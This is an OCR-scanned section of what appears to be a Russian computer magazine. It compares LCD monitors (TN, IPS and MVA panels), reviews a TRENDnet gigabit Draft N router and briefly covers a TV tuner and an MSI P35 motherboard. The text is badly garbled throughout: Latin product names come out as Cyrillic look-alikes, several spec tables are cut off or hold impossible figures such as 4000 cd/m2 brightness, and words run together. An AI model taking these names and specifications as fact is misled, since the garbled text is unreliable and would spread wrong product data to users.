проходитчерез эту спираль, но при этом основ- 
ной недостаток этой технологии в том, что почти 
нереально добиться «правильного» черного 
цвета, так как спиралевидные кристаллы про- 
пускают свет, даже когда находятся в свернутом 
состоянии (ячейка «выключена»). Другая про- 
блема — сильные отклонения рядов кристаллов. 
В связи с этим одна часть экрана вполне может 
освещаться хуже, а другая — лучше. Тоже самое 
касается цветопередачи, но в основном это 
заметно при просмотре сбоку, снизу или сверху. 
Малые углы обзора — бич технологии ТЫ. Среди 
плюсовтехнологии — высокая скорость реакции 



кристаллов, малая стоимость производства, 
что сделало модели, в которых реализована 
эта технология, наиболее востребованными на 
рынке. Также зачастую их рекомендуютзаядлым 
геймерам. 

Профессионалы в области графики и дизайна 
предпочитаютэкраны на базе ІР5-матрицы, и 
недаром — в них кристаллы расположены жестко 
параллельно друг другу, поворачиваются син- 
хронно во всех рядах, для чего в каждом из них 
расположены два электрода. Технология произ- 
водства здесь заметно дороже, причем размер 
дисплея сильноувеличивает стоимость модели, 
тогда как разница в цене между 17 и 20 дюймами 
ТЫ-матрицы нетак велика. ІРБ-матрица обеспе- 
чивает наиболее качественную цветопередачу, 
«правильный» черный цвети максимальные 
углы обзора. Зато скорость реакции кристаллов 
заметно ниже, что не особо мешаетдизайнерам, 
но противопоказано геймерам и, наверное, 
большинству обычных пользователей. 
Оптимальными по соотношению цены и качества 
на сегодняшний день являются мониторы с при- 
менением МѴА/РѴА-матрицы. В этой технологии 
кристаллы и вовсе расположены перпендику- 
лярно плоскости дисплея, также применяются 
электроды, схожие с теми, что устанавливаются 
в ІЗР-матрицы. А для того чтобы обеспечить 
быстрый и четкий поворот ряда кристаллов, 
электроды есть как на внешнем слое, так и на 
внутреннем. Соответственно, одновременно 
обеспечивается и «правильный» черный цвет 
без постоянной подсветки, и быстрая реак- 
ция матрицы, хотя она и несколько уступает 



таковой вТЫ-моделях. Эти мониторы пока не 
могут считаться бюджетными вариантами, да и 
профессионалы их недолюбливают за некоторые 
недочеты, связанные с цветопередачей. Но для 
тех, кто не гонится за самым большим размером 
дисплея и ко му достаточно непрофессионально- 
го, но приличного уровня качества, это отличный 
выбор. 

г МЕТОДИКАТЕСТИРОВАНИЯ 

Цветопередача оценивалась при помощи коло- 
риметра. Итогом его работы является график, 
состоящий изтрехлиний — красной, синей и 
зеленой, которые обозначают соответствую- 
щие цвета. В идеале после коррекции они все 
должны совпасть между собой и диагональю 
квадрата — это график отличного монитора. Чем 
больше отклонений отэтого эталона, тем боль- 
ше у дисплея проблем с качеством передачи 
цветов. 

Скорость отклика матрицы проверялась про- 
граммой ТРТіевС Она выводитна экран белый 
квадрат, движущийся по черному экрану. Здесь 
нужно проследить, насколько сильно идет 
размытие края квадрата и большой ли за ним 
тянется шлейф. Следующий шаг— проверка 
равномерности яркости матрицы: программа 
заливаетвесьэкран черным, а потом белым, и 
требуется внимательно посмотреть, не изменен 
ли цвет, особенно по краям монитора. 

Мы также обращали внимание на эргоно- 
мичность, легкость освоения и логичность 
построения экранного меню, удобство органов 
управления и дизайн монитора в целом. 
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Список тестируемого 
оборудования: 

А51І5 Р6221 , І_6 І_226ѴѴТСІ-ѴѴР, ѴіеѵѵБопіс ѴР2030Ь, ѴіеѵѵБопіс Ѵ62030»т, 
Батвипд 5упсМаз1:ег245В, Батзипд 5упсМазІег2232ВѴѴ 



Ю І.226ѴѴТ0-ѴѴР 

Технические характеристики: 

Диагональ, дюймы: 22 
Разрешение: 1680x1050 
Тип матрицы:ТЫ 
Контрастность: 3000: 1 
Яркость, кд/м2: 300 
Время отклика, мс: 2 
Углы обзора, градусы: 1 70 
Интерфейсы: ОѴІ, 0-5иЬ 
Размеры, мм: 501 ,7x423,5x233,9 
Вес, кг: 4,6 

•••ІІООООО 

Этот монитор отлично украсит собой квартиру-студию, в которой живет че- 
ловек с очень развитым чувством вкуса, настоящий эстет или мажор. Ответ 
на вопрос «Почему?» очень прост и связан с внешним видом устройства. 
Монитор имееточень стильный корпус, передняя панель которого выкра- 
шена в черный цвет(эдакая лакированная рамка), а задняя — в белый. 
Кнопку включения украшаетсветящаяся синяя полоса в виде галочки, 
а кнопки управления с приятным и понятным русифицированным меню 
спрятаны вниз. В общем, экстерьер отменный. Удобства использования 
добавляет вращающаяся подставка. Большой широкоформатный экран 
не дасттебе заскучать. На нем помешается огромное количество инфор- 
мации, что ты сможешь оценить и при работе, и при путешествиях по Сети, 
и, конечно же, в играх! Качество изображения отличное: контрастность, 
яркость, время отклика — все эти параметры находятся на очень высоком 
уровне. 




А5Ц5 Р6221 



Технические характеристики: 

Диагональ, дюймы: 22 
э азрешение: 1680x1050 
Тип матрицы: ТЫ 
Контрастность: 2000:1 
Яркость, кд/м2: 350 
Время отклика, мс: 2 
Углы обзора, градусы: 170/160 

Интерфейсы: ОѴІ, 0-513 В, аибіо, тіс, еаг, 115В, 5-ѴісІео 
Размеры, мм: 527x445x244 
Вес, кг: 10,7 



•••••••••О 

Чтобы перечислить все возможности этого монитора нужно очень много 
времени и места. Но места на столе он сэкономиттебе прилично — благода- 
ря встроенным колонкам, сабвуферу, веб-камере и ІІВВ-портам. И уже эти 
устройства делают рассматриваемый девайс необычным и узнаваемым. 
Кроме того, таковым его делает еще и внешний вид: черный корпус с се- 
ребристой задней панелью и феерически выглядящим сабвуфером сзади. 
Несомненной изюминкой этой 22-дюймовой махины является сенсорный 
управляющий экран передней панели. Красная подсветка смотрится 
очень стильно, а пользоваться таким средством управления удобно, хотя 
и непривычно. Стоит отметить, что все описанные навороты существенно 
отразились на весе и габаритахдевайса.такчто учитывай эти моменты. Для 
облегчения тяжелой геймерской жизни в этот дисплей имеет различные 
предустановленные режимы нетолько изображения, но и звука — одним 
нажатием ты можешь выбрать необходимый тебе профайл (учитываются 
даже жанры игр). Так что этот монстр несомненно подойдеттем, кто хочет 
иметьочень качественный и навороченный дисплей, который не похож ни 
на что другое. 
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Батзипд БупсМазІег 245В 



Технические характеристики: 

Диагональ, дюймы 
Разрешение: 1920x1 ] 

Тип матрицы: ТЫ 
Контрастность: 3000: ' 

Яркость, кд/м2: 4000 
Время отклика, мс: Е 
Углы обзора, градусы: 1 60 
Интерфейсы: ОѴІ, 0-51ІЕ 
Размеры, мм: 560x445,5x250 
Вес, кг: 10,6 




••••••••ОО 

Этот широкоформатный монитор сразу привлекает к себе внимание своим 
внешним видом, размерами и эргономикой. Первый два параметра тесно 
связаны друге другом — диагональ в 24 дюйма и угольно-черный корпус 
врядли могутоставить кого-то равнодушным. Выглядит изделие очень 
стильно. Эргономичностью отличается подставка монитора, которая 
не только вращается, но и регулируется как по наклону, таки по высоте. 
Оченьудобно. Авотв портретный режим монитор перевести, ксожалению, 
невозможно, хотя обычноудевайсов стакими подставками подобная 
возможность есть. Кроме того, любителям эргономики придется по вкусу 
соответствие стандартам ТСО’ОЗ и Епегду 5іаг. Благодаря своей широко- 
форматное™ ЭагпБипд 5упсМаз1:ег245В подойдет как для работы, так и для 
игр и прочих развлечений, благо качество картинки у него очень высокое, а 
на огромном экране помешается масса самой разнообразной информации. 
Стандартное для изделий Эатвипд менюудобно и легко управляемое с 
помощью стильных клавиш, которые совершенно не портят вид передней 
панели. Крометого, этотмонитор оснащен колонками. 



Батзипд БупсМазІег 2232ВѴѴ 



Технические характеі 

Диагональ, дюймы: 2 
Разрешение: 1680x1051 
Тип матрицы: ТИ 
<онтрастность: 3000: 1 
Яркость, кд/м 2: 300 
Зремя отклика, мс: 

Углы обзора, градусы: 1^ 
Интерфейсы: ОѴІ, 0-51ІЕ 
э азмеры, мм: 514,6x422x21 9 
Зес, кг: 5 




••••••••ОО 

Если длятебя среди характеристиклюбой вещи на первом месте стоитее 
внешний вид, стильность, впечатление, которое она производит на окружа- 
ющих, то этотмонитор длятебя. Антрацитово-черный корпус, блестящий, 
с плавными обводами и спрятанными внизу передней панели кнопками 
управления, — он оживитлюбой интерьер. Вы глядит действительно очень 
красиво и необычно. Если немаловажным фактором для тебя является 
функциональность, то этот монитор тебе также подойдет. Он оснащен 
полным набором фирменных технологий компании Эатзипд, улучшающих 
качество картинки и снижающихуровень энергопотребления, имеет время 
отклика, равное 2 мс, порт ЕЮСР (для работы с защищенным контентом), 
а также высокий уровень яркости и контрастности. Кинематографическое 
соотношение сторон и 22 дюйма диагонали отлично по дойдут не толь ко для 
просмотра кинофильмов, развлечений и игр, но и для работы вследствие 
высокого качества картинки и большого объема помещающейся на экране 
информации. Монитор сертифицирован для работы с ѴѴіпсІоѵѵз Ѵізіа. 



РЕДАКЦИЯ ВЫРАЖАЕТ БЛАГОДАРНОСТЬ ЗА ПРЕДОСТАВЛЕННОЕ НАТЕСТИРОВАНИЕ ОБОРУДОВАНИЕ РОССИЙСКИМ 
ПРЕДСТАВИТЕЛЬСТВАМ КОМПАНИЙ А5У5, ѴІЕѴѴ50ШС, 1.0 И 5АМ51ІНС. 
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Кгаііѵѵау рекомендует подлинную ОС 
ѴѴІпсіоѵѵб ѴІБІа® Ноте Ргетіит 



Сыграем 

Л оі'?* саюи *эя 



а/ 



Супермощная 

игровая станция 
Кга^ѵѵау Ісіеа на базе 
четырехъядерного 
процессора 
I пТеІ® Соге™ 2 С)иасІ 
и видеокарты 8 поколения 
ІМѴЮІА СеРогсе ! 



^кгаПімгу 8 

ТЕХНОЛОГИИ ДЛЯ ЛЮДЕЙ 



Узнайте больше о преимуществах компьютера КгаГіѵѵау Ісіеа по телефону бесплатной консультационной линии 8-800-200-19-91 или на сайте ѴѴѴѴѴѴ.кга'ГіѴѴау.Ги 
Приобрести компьютеры Кга^ѵѵау Ісіеа вы можете в магазинах федеральных розничных сетей или у партнеров компании в регионах. 

ІпТеІ, логотип ІпТеІ, ІпТеІ Соге и Соге являются товарными знаками на территории США и других стран. Товар сертифицирован. Комплектацию уточняйте у продавца. Реклама. 






Теггигм 




Технические характеристики: 

Диагональ, дюймы: 20,1 
Разрешение: 1600x1200 
Тип матрицы: МѴА 
Контрастность: 1000:' 

Яркость, кд/м2: 300 
Время отклика, мс: 

Углы обзора, градусы: 1 1 
Интерфейсы: йѴІ, 0-311 В , ІІ5Е 
Размеры, мм: 468x403x31 ^ 

Вес, кг: 7 



••••••••00 

С первого взгляда не поражающий своим внешним видом, этотмонитор 
удивляет своими функциональными возможностями. Взять хотя бы его под- 
ставку, которая позволяет регулировать положение экрана во всех плоскос- 
тях и даже по высоте. Крометого, рассматриваемому девайсу доступен как 
портретный, так и ландшафтный режим работы, что, в общем-то, достаточно 
удобно. И, наконец, на подставке кроме традиционных разъемов йѴІ и й- 
511В находятся четыре разъема 115В оиі и один 115В іп. Воттакое раздолье 
для подключения всего чегоугодно. Экранное меню простое и довольно 
удобное; внешний вид, какуже говорилось, стандартный. Экран большой и 
качественный, цвета яркие и естественные. Этому во многом способствует 
высокая контрастность этого изделия — 800:1 .Ложкой дегтя в бочке меда 
является отсутствие русского языка в экранном меню, а уравновешиваю- 
щим это обстоятельство плюсом — полный набор необходимых проводов 
ко всем портам в комплекте поставки. Так как шнуров можетбыть много, на 
задней стороне предусмотрены специальные крепления для их аккуратно- 
го размещения. 




ѴіеѵѵБопіс Ѵ62030ѵѵт 



Технические характеристики: 

Диагональ, дюймы: 20 
э азрешение: 1680x1050 
Тип матрицы: ТЫ 
<онтрастность: 80 
Яркость, кд/м 2: 30 
Зремя отклика, мс: 

Углы обзора, градусы: 160/1 70 
Интерфейсы: ОѴІ, 0-51ІЕ 
э азмеры, мм: 493x500x230 
Зес, кг: 8 




••••••••00 

Это очень приятный и в некоторых деталях необычный монитор, широко- 
форматность которого позволяет сделать его частью домашнего киноте- 
атра. Корпус устройства выкрашен в черный. Его внешний вид не портят 
кнопки управления — они скрыты на боковой панели, а на передней гордо 
красуется только одна кнопка — включения. Меню, к слову, довольно 
простое и удобное, как, впрочем, и управление им. Подставка у изделия ин- 
тересная — она позволяет не только регулировать наклон дисплея, но и по- 
ворачивать его по кругу, так что, выбрав его, больше не придется царапать 
стол. Задняя панель благодаря хитрой системе дает возможность аккуратно 
расположить кабели. Качество изображения и цветопередачи высокое. 
Этотмонитор имеет большие габариты, так что его транспортировка может 
стать проблемой. Не очень понятнотолько, зачем втаком изделии встроен- 
ные колонки, которые увеличиваютего размеры, вес и цену. 



г ВЫВОДЫ 

Итак, сегодня ты можешь при- 
обрести себе качественный 
20-дюймовый ЖК-монитор за 
относительно небольшие деньги. 
И это будет хорошее вложение 
средств. Причем среди бюджет- 



ных моделей есть возможность 
выбрать устройство с дизайном, 
который подойдет именно тебе. 
Пусть в нем не будет всяких 
дополнительных функций, зато 
свою основную задачу оно будет 
выполнять хорошо. Если ты готов 



заплатить побольше, то у твоего 
девайса будет и необычная под- 
ставка с ОБВ-хабом, и много всего 
еще. Такие модели есть в нашем 
сегодняшнем тесте, присмотрись к 
ним повнимательнее. Один из них, 
а именно Эатэипд БупсМазІег 



245В, становится кавалером орде- 
на «Выбор редакции» за богатую 
функциональность и высокое 
качество изображения. А «Лучшая 
покупка» сегодня — удобный 
и функциональный ѴіеѵѵБопіс 
ѴР20306. =К= 
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иРСВАйЕ ! 



ВСЕ ТОЛЬКО 





Кому гигабитный 

ОгаП N7 

Обзор роутера ТКЕКРпеІ: ТЕѴѴ-633СК. 





Уже прошло больше года с момента появления первых Огаіі N роутеров. Если ты пом- 
нишь, то с новым стандартом ѴѴІ-Рі нам обещают канальную скорость передачи данных 
300 Мбит/сек. Что интересно, долгое время Огаіі N роутеры выпускались с 100-мегабит- 
ными свитчами на борту. То есть, как можно было бы подумать, скорость ѴѴІ-Рі у такой 
точки доступа теоретически ограничивалась скоростью проводных портов. Конечно же, 
на деле даже скорость самых быстрых Эгай N комплектов едва ли была близкой к завет- 
ной сотне. Однако спустя некоторое время производители стали-таки выпускать гига- 
битные роутеры. Ріорой это означает, что только порты свитча действительно поддержи- 
вают скорость 1000 Мбит/сек, а ѴѴАКІ-порт по старинке работает на 100 Мбит/сек. Хотя в 
принципе нет никакой сложности в том, чтобы сделать все порты гигабитными. Что это 
даст на деле? Сегодня на этот вопрос попробует ответить компания ТКЕХОпеР 



г ВНЕШНИЙ ВИД И КОМПЛЕКТАЦИЯ 

Действительно, времена, когда все сетевое оборудование представляло 
собой серенькие невзрачные коробки, уже прошли. Сейчас все основные иг- 
роки этого рынка стараются выпускать уникальные продукты не только сточки 
зрения функциональности, но и в плане внешнего вида.ТРЕМОпеіТЕѴѴ- 
бЗЗбНупакован в черный глянцевый обтекаемый корпус. С боковой стороны у 
него располагаются три антенны с коэффициентом усиления 4 бВі. На лицевой 
стороне находятся светодиоды питания, активности интернет-соединения, 
портов І_АЫ, беспроводного соединения, а также функции ѴѴР5. На тыльной 
стороне располагаются четыре гигабитных порта І_АЫ, один гигабитный 
ѴѴАЫ, кнопка сброса на заводскиеустановки и разъем питания. В комплекте 
к устройству прилагается патч-корд длиной 1,5 м, подставка для установки 
в вертикальном положении, краткая инструкция по инсталляции на шести 
языках (включая русский) и компакт-диск с утилитой быстрой настройки. 

^ АППАРАТНАЯ НАЧИНКА 

Поскольку ТТХ этого роутера практически полностью повторяют предыду- 
щую модель ТРЕІ\Юпе1: ТЕѴѴ-631 ВНР, нам было очень интересно сравнить 
их аппаратную начинку. Сердцем нового роутера является процессор 
УЬісот ІР51 6011 с возможностью одновременной обработки 1 0 потоков (в 
ТЕѴѴ-631 ВРР был процессор ІІЬісот ІР3023 с одновременной обработкой 
восьми потоков). Используется микросхема оперативной памяти МІРА 



Р2556О40СТР объемом 64 Мб и работающая на частоте 200 МГц; СІ_=2.5 (в 
предыдущей модели было 8 Мб памяти того же производителя). Микро- 
схема ѴѴі-Рі оказалась аналогичной тому, что мы видели в ТЕѴѴ-631 ВРР, 
это АіЬегоз АР5416. Также на плате распаян чип пятипортового гигабит- 
ного коммутатора Ѵііеззе Ѵ5С7385ХУѴ. 

0 ФУНКЦИОНАЛЬНЫЕ ВОЗМОЖНОСТИ 

Как мы могли убедиться, начинка новой модели роутера очень схожа с 
тем, что мы видели в ТРЕЫОпеІ: ТЕѴѴ-631 ВРР. Теперь взглянем на функ- 
циональность продукта. Несмотря на то что используется тотже ѴѴі-Рі 
чип, что и в предыдущем поколении роутеров ТРЕЫОпеІ, производитель 
заявляет о полной совместимости с черновым вариантом ІЕЕЕ 802.1 1 п 
ОгаО: 2.0. На сайте ѴѴі-Рі АШапсе в списке сертифицированных устройств 
йгаИ: 2.0 мы не обнаружили ТРЕІѴЮпеІ ТЕѴѴ-6336Р. Однако там присут- 
ствует роутер 5МСѴѴ6ВР14-Ы, являющийся точной копией рассматри- 
ваемого здесь продукта. Таким образом, можно считать, что ТРЕЫОпеІ 
ТЕѴѴ-6336Р действительно совместим со спецификацией О га К N 2.0. 

На ѴѴАІЧ- интерфейсе могут использоваться как статические/динами- 
чески получаемые настройки ІР, так и ѴРЫ-соединения РРТР, І_2ТР и 
РРРоЕ. В случае протоколов РРТР и І_2ТР при активации интернет-со- 
единения доступ к локальным ресурсам теряется. И хотя возможность 
прописывания статических маршрутов здесь имеется, одновременный 
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Технические характеристики: 

ІМЙШЛЛ8ВЯІ < ѴѴАИ ІР.І-45) Ю/ЮО/ЮОО Мбит/сек, 4х І-АЫ (Р.І-45) 
ю/юо/юоо Мбит/сек 

: 802.11 Ь/д + РгаН N I до ЗОО 

Мбит/сек) 

ІгШ.І.ШІІ.ЦЛа ѴУЕР (до 128 бит), ѴѴРА/ѴѴРА-Р5К, ѴѴРА2/ѴѴРА2-Р5К 
(ТКІР/АЕ5), поддержка РА0Ш5 

МЩІНІІШЦгі.ЬИ 1 АТ/МАРТ. ОупРМЗ, РНСР, Зіаііс Роиііпд, ТгаНіс 
ЗЬаріпд 

Раскеі РіКегіпд, Оотаіп/ІІРЬ РіКегтд, МАС 

РіИегіпд 

Щ;Щ^11ЛД^^^И5(геатЕпдіпе, Ѵ/Р5 
И$150 



роутинг двух соединений (а при активации РРТР/І_2ТР-сессии на ѴѴАЫ- 
интерфейсе образуется второй ІР-адрес) невозможен. 

Как и в предыдущей модели, здесь присутствует функция автоматической 
классификации трафика 5ігеатЕпдіпе. Она автоматически определяет 
пропускную способность внешнего канала и на основании встроенных 
правил (также доступно создание собственных) обеспечиваетприоритет 
игрового и мультимедиа-трафика над трафиком данных. Таким обра- 
зом, пинг в играх остается практически неизменным даже при запуске 
огромного числа файловых закачек. Замечено, правда, что эта функция не 
всегда корректно отрабатывает определение скорости канала, что ведет к 
уменьшению скорости ѴѴАЫ-интерфейса, а иногда и вовсе к невозможнос- 
ти установить интернет-соединение. 

Стоит отметить две новые опции ѴѴі-Рі, этоѴѴІЗН и ѴѴР5. Первая (ѴѴігеІезв 
Іпіеііідепі: 5ігеат НапсІІіпд) является частью функции ВігеатЕпдіпе и 
также используется для классификации трафика при передаче через 
ѴѴі-Рі. Основной ее целью является повышение эффективности работы 
мульти медиа- контента в беспроводных сетях. Функция ѴѴР5 (ѴѴі-Рі 
РгоІесІесІ 5еІир) призвана облегчить процесс настройки ѴѴі-Рі для 
неопытных пользователей. Если все твои устройства поддерживают этот 
стандарт, то все, что требуется тебе для того, чтобы объединить их в сеть, 
— это включить питание и нажать кнопку ѴѴР5 (на самом устройстве или 
в его драйвере) или же ввести РІІЧ-код. РІастойки 551 й и шифрования 
автоматически передадутся клиенту сточки доступа. 

В остальном набор функций практически не изменился и по сути стан- 
дартен для интернет- шлюзов такого типа. А теперь перейдем к нашим 
тестовым испытаниям. 



Н МЕТОДИКАТЕСТИРОВАНИЯ 

Для тестирования проводного и беспроводного сегментов использовал- 
ся программный продукт ІЧеІІСІ СЬагіоІ; и скриптТЬгоидбри! с передачей 
пакетов максимального и минимального размера. Ріа двух станциях 
устанавливалисьтак называемые епброіпі-программы, затем в консоли 
ІЧеіЮ СЬагіоІ запускался скрипт генерации трафика. Все измерения 
проводились с прошивкой версии 1 .0.0.5. 

1 . При тестировании пропускной способности ѴѴАЫ -> І_АІ\| одна из 
станций подключалась к одному из портов свитча (интерфейс І_АЫ), 
вторая — к ѴѴАЫ-порту. Таким образом, мы получали пиковую пропускную 
способность для ѴѴАІЧ-интерфейса (также ее можно называть скоростью 
ЫАТ). Измерялась скорость однонаправленной передачи (направления 
ѴѴАІЧ-> І_АЫ и І_АІМ -> ѴѴАЫ) и в режиме полного дуплекса (РОХ). Также мы 
провели дополнительный замер при включении функции 5ігеатЕпдіпе. 

2. Поскольку при активации интернет-соединения по протоколу РРТР 
создается дополнительная нагрузка на центральный процессор роутера, 
мы также измерили пропускную способность РРТР. Для этого за ѴѴАЫ- 
интерфейсом маршрутизатора был поднятѴРЫ-сервер. Крометого, про- 
верялась возможность установки ѴРЫ-соединения в случае размещения 
ѴРЫ-сервера вне сегмента нахождения нашего маршрутизатора. 

3. Для оценки скорости ѴѴі-Рі мы использовали РСМСІА-адаптер 
ТРЕЫОпе1:ТЕѴѴ-621 РС. Измерения проводились в типичной квартире из 
двух точек с разным удалением от роутера. В первом случае удаление не 
превышало 1 м и, как следует, измерялась максимальная скорость пере- 
дачи данных. Во втором случае ноутбук с ѴѴі-Рі адаптером находился на 
расстоянии 1 0 м отточки доступа по диагонали за стеной. Во всех случаях 
использовалась шифра ция трафика ѴѴРА-Р5К с ключом ТКІР. 

4. В качестве дополнительного исследования была проведена проверка 
на уязвимости со стороны ѴѴАЫ-интерфейса с помощью программного 
продукта ТепаЫе ЫеБвиз. Сканирование проводилось в двух режимах: с 
включенным и выключенным файрволом. 

г РЕЗУЛЬТАТЫ ТЕСТОВ 

В этот раз мы не будем детально останавливаться на каждом полученном 
значении, благо на графиках все итакхорошо видно. «Гигабитность» 
ѴѴАЫ-порта не избыточна, и в режиме ІЧАТ роутер показывает отменную 
пропускную способность в направлении І_А!Ч -> ѴѴАІЧ, которая лишь немно- 
го не дотягивает до 300 Мбит/сек. В обратную сторону результат почти вдвое 
хуже, что, скорее всего, обусловлено особенностями обработки трафика в 
этом направлении центральным процессором устройства. Скорость РРТР 
туттакже на очень высоком уровне, однако из 1 00 Мбит/сек выйти все-таки 
не удалось. Нужна ли такая скорость среднестатистическому юзеру? От себя 
могу лишь сказать, что весьма приятно скачивать горуторрентов на скоро- 
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Интерфейс настройки ТПЕЫОпеіТЕѴѴ-бЗЗѲР: вкладка функции 
ЗіхеатЕпдіпе 



сти 7-8 Мб/сек. При хорошем раскладе 4-5 Гбтрафика улетучиваются менее 
чем за 1 0 минут. К слову, такая скорость вполне по зубам ряду московских 
провайдеров, предоставляющих широкополосный доступ. 

Мы также приводим скоростные замеры с включенной и выключенной 



функцией ЗігеатЕпдіпе. Как видно, пропускная способность в направ- 
лении ѴѴАЫ-> І_АЫ изменяется некритично, а вот в направлении І_АЫ -> 
ѴѴАЫ катастрофически падает до жалких 2,865 Мбит/сек. Возможно, это 
особенность данной версии прошивки, однако факт имеет место быть. 
Скорость ѴѴі-Рі находится на ожидаемо высоком уровне. Однако 
стоит отметить, что добиться стабильно высоких значений довольно 
непросто. Многие устройства 0 га К N весьма чувствительны к поло- 
жению антенн и собственному расположению в пространстве, отчего 
скоростные показатели могут отличаться в разы. В целом на корот- 
кой и средней дистанциях роутер показал высокие результаты. Для 
проверки совместимости мы также произвели замеры скорости ѴѴі-Рі 
роутера ТРЕЫОпеІ: ТЕѴѴ-6336Р с адаптерами АЗИЗ ѴѴІ_-1 ООѴѴ и Ыпкзуз 
ѴѴРС4400Ы. Результаты оказались примерно на том же уровне, что и с 
«родным» адаптером. 

Сканирование в ТепаЫе Ыеззиз невыявилоу роутера ни одной уязви- 
мости, что говорит о его достаточно хорошей защищенности. 

в ВЫВОДЫ 

Итак, что же можно сказать по результатам нашего тестирования? 
Во-первых, совершенно очевидно, что наличие гигабитных портов 
снимает скоростное ограничение интерфейса, и нам становится 
понятно, на что способны современные процессоры для 30Н0-ус- 
тройств. А способны они, как оказалось, на многое. На примере 
ТРЕЫОпеІ: ТЕѴѴ-633ѲР видно, что в режиме маршрутизации мы можем 
рассчитывать на 1 50-300 Мбит/сек чистой пропускной способности 
ѴѴАІЧ-интерфейса. В режиме РРТР скорость хоть и падает, но остается 
на довольно высоком уровне. Также стоит отметить высокую ско- 
рость ѴѴі-Рі, которая благодаря сертификации ѴѴі-Рі АШапсе теперь 
достигается при использовании оборудования разных вендоров 
(со списком сертифицированных устройств можно ознакомиться на 
сайте ѵѵѵѵѵѵ.ѵѵі-Л.огд І. Существенным недостатком рассматриваемого 
роутера является недоработанная функция ЗЕаТі с Роиііпд, которая 
не позволяет одновременно маршрутизировать РРТР-соединение и 
внутреннюю сеть провайдера. Если же это некритично, то ТРЕЫОпеІ: 
ТЕѴѴ-6336Р можно назвать примером добротного высокопроизво- 
дительного интернет-шлюза со встроенной точкой доступа ѴѴі-Рі 
последнего поколения, т 



Падение скорости при использовании функции 5(геатЕпдіпе 
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Падение скорости при использовании функции ЗіхеатЕпдіпе: как видно, 
при активации этой функции очень серьезно страдает пропускная способ- 
ность ЕАЫ -> ѴѴАЫ. 



Скорость ѴѴі-Рі (тіпраскеЫге): скорость ѴѴі-Рі при передаче пакетов мини- 
мального размера 



Скорость ѴѴі-Рі (максимальная длина пакета) 
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Скорость ѴѴі-Рі (тахраскеізііе): скорость ѴѴі-Рі при передаче пакетов макси- 
мального размера 



Пропускная способность: на графике представлена пропускная способ- 
ность в двух режимах: с использованием протокола РРТР и в режиме Зѣаѣіс 
ІР (ЫАТ Опіу ' 



ТЕ5Т_І_АВ ВЫРАЖАЕТ БЛАГОДАРНОСТЬ ЗА ПРЕДОСТАВЛЕННОЕ НА ТЕСТИРОВАНИЕ ОБОРУДОВАНИЕ РОССИЙСКОМУ ПРЕДСТАВИ- 
ТЕЛЬСТВУ КОМПАНИИ ТКЕИОНЕТ. 
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Телевизор для любителей цифры 
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модификацию системы 



Техническиехарактеристики: 

Процессорный разъем: І.ОА775 
Северный мост: Іпіеі Р35ѲМСН 
Южный мост: Іпіеі ІСН9К 

Память: поддержка РІММ-модулей стандарта РОКЗ-вОО/юбб 50ВАМ 
Разъемы РСІ : 2х РСІе хіб (іх хіб, 1хх4), 2х РСІе хі, 2х РСІ 
Накопители: Іх Ш(га АТА І2 привода), 5х5егіаІАТАЗ,0 Г6ит/с, 2хе5АТА 
Интерфейс 115В: Зх 115В 2.0 12 порта на разъем), 6х 115В 2.0 
Рігеѵѵіге: 2х ІЕЕЕ-1394 РігеІМге, один вывод на заднюю панель 
Звук: кодек Веаііек АІ.С888Т8 + 2 каналов + кодек ѴоІР, 6 аналоговых 
звуковых портов (канал 7.1 + вход микрофона + линейный вход) 

Сеть: контроллер Веаііек ВТ1-8111В,1-Гб сетевой порт 
Форм-фактор: 244x305 Риіі АТХ 

■ 



Техническиехарактеристики: 

Интерфейс: РСІ-Ехі 

Поддерживаемые форматы вещания: ЫТ5С, РАЦ БЕСАМ, РМ, РѴВ-Т 
Поддерживаемые форматы сжатия: МРЕС-1, МРЕЗ-2, МРЕ6-4 
(аппаратно) 

Форматы стереозвучания: ЗАР/ЕІА-І/ЫІСАМ/Аг/РМ-стерео 




1. Подключение осуществляется по шине РСІ-Е, вто время какобычно она 
остается свободной. 

2. Цифровой селектор обеспечиваетхорошее качество приема сигнала 
даже при подключении к комнатной антенне. 

3. Низкий профиль платы позволяетустанавливать ее в ЬагеЬопе-системы 
при замене монтажной планки. 

4. Поддержка аппаратного кодирования сигнала в МРЕб-1/2/4 снимает 
нагрузку с центрального процессора. 

5. Возможно управление питанием компьютера непосредственно с пульта 
при подключении кнопки питания через плату тюнера. 

6 . Качество приема приятноудивляет— на комнатную антенну поймано 
5 каналов. Радио звучит без помех. 

7. Поддержка цифрового вещания ОѴВ-Т будетхорошим заделом на буду- 
щее — это еще и возможность бороздить просторы Сети. 

8 . Русскоязычный софтлегко настраивается и доступен для быстрого 
изучения всех возможностей. 

Ѳ 

1. Желательно иметь большую чувствительность селектора для лучшего 
качества приема. 



1. Плата М5І Р35 ОіатопсІ поддерживает йІММ-модули стандарта йОРЗ. 
Для ихустановки предусмотрены все четыре слота. Порты каналов памяти 
располагаются попарно и отличаются по цвету. 

2. Сама плата построена на основе набора системной логики Іпіеі Р35 
Ехргезз, также известного как Веагіаке (Іпіеі Р35 и ІСН9Р — северный и 
южный мосты соответственно). Возможности этого чипсета дополняет схема 
контроллера ввода-вывода Ріпіек Р71882РС. Если говорить о поддерживае- 
мых процессорах, то платформа с легкостью сможет работать в паре с любым 
современным камешком от Іпіеі, включая четырехъядерные Соге 2 ОиасІ. 

3. Все схемы чипсета охлаждаются оригинальной конструкцией из меди, 
которая похожа скорее на модель американских горок, нежели на кулер. 
Всему виной лихо закрученные в спирали многочисленныетепловыетруб- 
ки. Охлаждаются такой системой и схемы питания М05РЕТ. 

4. Звуковой контроллер реализован связкой интегрированного в южный 
мост контроллера НідЬ Оеііпіііоп АисІіо и аудиокодека Веаііек АЕС888Т, 
обеспечивающего возможность воспроизведения звука формата 7.1 и 
поддерживающего технологию йоІЬу йідііаі Еіѵе!, а также формат йТБ. 

0 

1. Память ООРЗ пока что не особо распространена на рынке. Сомневаю- 
щимся лучше приглядеться к платам, работающим с более старыми форма- 
тами памяти. Также расстраивает высокая цена продукта. 



ТЕ5Т_ЬАВ ВЫРАЖАЕТ БЛАГОДАРНОСТЬ ЗА ПРЕДОСТАВЛЕННОЕ 
НА ТЕСТИРОВАНИЕ ОБОРУДОВАНИЕ КОМПАНИЯМ «НЕВАДА» 

(Т. (495) 981-4839, УУЖУУ.ЫЕУАРА.ки |. «ОЛДИ» (Т. (495) 221- 
ІИ 1 , ѴѴѴт.ОІ-РІ.КЩ .А ТАКЖЕ РОССИЙСКИМ ПРЕДСТАВИТЕЛЬ- 
СТВАМ КОМПАНИЙ М5І И ЮОІТЕСН. 



